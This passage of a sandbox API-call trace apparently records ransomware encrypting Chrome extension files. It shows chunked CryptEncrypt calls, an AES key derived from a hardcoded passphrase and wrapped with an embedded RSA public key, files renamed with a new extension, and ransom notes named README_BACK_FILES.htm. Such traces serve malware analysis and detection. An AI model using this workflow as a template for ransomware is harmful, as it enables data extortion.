lpOverlapped=0x0) returned 1 [0264.061] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.061] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.061] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.061] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.062] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.062] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.062] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.062] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.062] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.062] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.063] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.064] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.064] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.064] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.064] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x17a, lpOverlapped=0x0) returned 1 [0264.064] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x17a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x180) returned 1 [0264.064] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x180, lpOverlapped=0x0) returned 1 [0264.064] CloseHandle (hObject=0x5d60) returned 1 [0264.064] CloseHandle (hObject=0x5d5c) returned 1 [0264.064] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0264.067] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0264.068] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0264.069] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0264.070] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.070] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.070] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.070] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.070] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0264.070] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0264.070] AreFileApisANSI () returned 1 [0264.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.070] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.071] GetFileType (hFile=0x5d64) returned 0x1 [0264.071] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.072] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.072] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0264.072] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.072] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.072] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.072] GetLastError () returned 0x0 [0264.073] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json")) returned 0x20 [0264.073] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0264.074] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.074] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.075] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.075] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.078] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.078] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.078] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.078] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0264.078] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.078] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.078] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e768f8) returned 1 [0264.079] CryptImportPublicKeyInfo (in: hCryptProv=0x2e768f8, dwCertEncodingType=0x1, pInfo=0x2eafb20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eafb50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eafb58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7f080) returned 1 [0264.079] CryptEncrypt (in: hKey=0x2e7f080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.079] CryptEncrypt (in: hKey=0x2e7f080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76298*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e76298*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.079] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e76298*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e76298*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.080] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.091] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.091] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 